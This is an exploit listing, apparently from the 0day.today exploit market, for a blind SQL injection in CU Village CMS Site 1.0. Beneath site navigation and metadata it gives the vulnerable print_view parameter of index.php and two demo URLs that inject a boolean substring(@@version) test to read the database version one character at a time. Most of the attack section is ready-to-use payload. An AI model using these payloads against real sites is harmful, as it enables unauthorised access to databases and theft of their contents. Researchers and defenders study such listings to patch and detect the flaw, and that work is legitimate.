[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability

Author
Red-D3v1L
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10643
Category
web applications
Date add
08-01-2010
Platform
unsorted
======================================================================
CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability
======================================================================


[?] Script:               [ Cms Site 1.0 ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://cuvsolutions.cu-village.com/]

===[ Exploit SQL Blind ]===
   
[»]Exploit : index.php?page_id=293&print_view=[ inject c0dE ]
 
[»]dem0:
 
http://server/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=4  << This True
 
http://server/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=5  << This Faulse 



#  0day.today [2024-12-24]  #